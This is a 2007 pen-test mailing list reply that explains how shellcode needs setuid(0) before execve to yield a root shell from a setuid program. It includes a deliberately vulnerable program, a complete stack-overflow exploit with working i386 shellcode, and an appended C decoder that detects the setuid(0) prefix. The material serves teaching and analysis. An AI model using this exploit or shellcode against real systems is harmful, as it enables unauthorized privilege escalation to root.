| To: | "Andrea Purificato - bunker" <bunker@fastwebnet.it>, <pen-test@securityfocus.com> |
|---|---|
| Subject: | Re: question on escalating privileges via suid vulnerabilities |
| From: | Fábio Russo <fabio.contin.russo@gmail.com> |
| Date: | Tue, 27 Feb 2007 08:16:43 -0300 |
| References: | <7c488dd80702241052y225c158fn9b2c8372f10a6f3b@mail.gmail.com> <200702262051.15560.bunker@fastwebnet.it> |
> Try with "setuid(0);" before execve :-)
>
> --
> Andrea "bunker" Purificato
> +++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
> ++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.
> http://rawlab.mindcreations.com
Hi.
Some applications need a setuid(0) before the /bin/sh string because
they have the suid bit set.
See the example below:
```c
// Bugged program with the setuid bit set and root privileges:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
    char env[96];
    // Shows the buffer address, which is the return address used for exploiting
    printf("- %p -\n", (void *)&env);
    // The bug: unbounded copy of an environment variable into a 96-byte stack buffer
    strcpy(env, getenv("BOLINHA"));
    return 0;
}
```
```c
// exploit: usage ./exploit <bugged_program> <return addr>   (i386 Linux)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;
// First 8 bytes: setuid(0); then execve("/bin/sh"); then exit
char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv)
{
    char string_longa[129];                       // 128 payload bytes plus a terminating NUL for setenv()
    unsigned int *ptr = (unsigned int *) string_longa;  // 4-byte cells: 32 * 4 = 128 bytes
    int i;
    if (argc != 3) {
        fprintf(stderr, "usage: %s <bugged_program> <return addr>\n", argv[0]);
        return 1;
    }
    // Fill the payload with the return address printed by the bugged program
    for (i = 0; i < 32; i++) *(ptr + i) = (unsigned int) strtoul(argv[2], NULL, 16);
    // Put the shellcode at the start of the payload
    for (i = 0; i < (int) strlen(shellcode); i++) string_longa[i] = shellcode[i];
    string_longa[128] = '\0';
    // Hand the payload to the target through the BOLINHA environment variable
    setenv("BOLINHA", string_longa, 1);
    execle(argv[1], argv[1], NULL, environ);
    // Only reached if execle() failed
    printf("%s\n", string_longa);
    return 0;
}
```
Taking a close look at the exploit source code, we can see that
the first bytes in the shellcode are the setuid(0),
more precisely the \x31\xc0\x31\xdb\xb0\x17\xcd\x80.
This is needed to get a root shell.
If you cut those bytes off from the shellcode, you will get a shell
that belongs to the user who executed the exploit.
I hope it can be useful for someone. :-)
bye.
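As an added example (not code from the post or from either of its authors), the following C program decodes the small i386 instruction subset that such a prologue uses (the self-zeroing `xor r32,r32`, `mov r8,imm8` and `int 0x80`) and reports the syscall number and ebx value at the first `int 0x80`, so a captured payload can be checked for the setuid(0) stub the post describes. The byte string is the shellcode from the post, embedded here as input; the function names, the `syscall_stub` struct and the constant `I386_SYS_SETUID` (23 is setuid(2) on i386 Linux) are my own. Decoding stops at the first instruction outside the subset, which is why the same check on the shellcode with its 8-byte prefix removed finds no setuid(0) stub.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* i386 Linux syscall number for setuid(2); the prefix selects it with "mov al, 0x17" */
#define I386_SYS_SETUID 23

/* What the decoder reports about the first int 0x80 it reaches */
struct syscall_stub {
    int found;          /* 1 when an int 0x80 was reached inside the decoded subset */
    unsigned int eax;   /* syscall number in eax at that point */
    unsigned int ebx;   /* first argument (ebx) at that point */
    size_t length;      /* bytes consumed up to and including the int 0x80 */
};

/* Shellcode copied from the post, used here as constructed input (i386 Linux) */
static const unsigned char page_shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"                 /* setuid(0) prefix */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07"
    "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
    "\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc"
    "\xff\xff\xff/bin/sh";
static const size_t page_shellcode_len = sizeof(page_shellcode) - 1;

/* Decode the tiny instruction subset used by such prologues:
 *   31 /r   xor r32, r32   (only the self-zeroing form, e.g. xor eax,eax)
 *   B0+r ib mov r8, imm8   (al, cl, dl, bl)
 *   CD 80   int 0x80
 * Any other byte sequence ends decoding. Returns 1 and fills *out when an
 * int 0x80 is reached with eax and ebx both set by the decoded code. */
int decode_first_syscall(const unsigned char *code, size_t len, struct syscall_stub *out)
{
    unsigned int regs[4] = {0, 0, 0, 0};  /* eax, ecx, edx, ebx */
    int known[4] = {0, 0, 0, 0};          /* only trust registers the code itself set */
    size_t i = 0;

    memset(out, 0, sizeof *out);
    while (i + 1 < len) {
        unsigned char op = code[i], arg = code[i + 1];
        if (op == 0x31 && (arg & 0xc0) == 0xc0 &&
            ((arg >> 3) & 7) == (arg & 7) && (arg & 7) < 4) {
            regs[arg & 7] = 0;            /* xor reg, reg clears the register */
            known[arg & 7] = 1;
        } else if (op >= 0xb0 && op <= 0xb3 && known[op - 0xb0]) {
            regs[op - 0xb0] = (regs[op - 0xb0] & 0xffffff00u) | arg;  /* mov r8, imm8 */
        } else if (op == 0xcd && arg == 0x80) {
            if (!known[0] || !known[3]) return 0;   /* eax/ebx not determined by the code */
            out->found = 1;
            out->eax = regs[0];
            out->ebx = regs[3];
            out->length = i + 2;
            return 1;
        } else {
            return 0;   /* outside the subset, e.g. the jmp that follows the prefix */
        }
        i += 2;
    }
    return 0;
}

/* Does the byte string begin with a setuid(0) syscall stub? */
int starts_with_setuid0(const unsigned char *code, size_t len)
{
    struct syscall_stub s;
    return decode_first_syscall(code, len, &s) && s.eax == I386_SYS_SETUID && s.ebx == 0;
}

int main(void)
{
    struct syscall_stub s;
    if (decode_first_syscall(page_shellcode, page_shellcode_len, &s))
        printf("first syscall: eax=%u ebx=%u after %zu bytes -> %s\n",
               s.eax, s.ebx, s.length,
               (s.eax == I386_SYS_SETUID && s.ebx == 0) ? "setuid(0)" : "other");
    /* With the prefix cut off, decoding stops at the jmp and no stub is identified */
    printf("without prefix: %s\n",
           starts_with_setuid0(page_shellcode + 8, page_shellcode_len - 8)
               ? "setuid(0)" : "no setuid(0) stub");
    return 0;
}
```

The decoder is deliberately narrow: it only follows register writes it has seen, so a payload that reaches `int 0x80` with eax or ebx loaded some other way is reported as undecoded rather than guessed at.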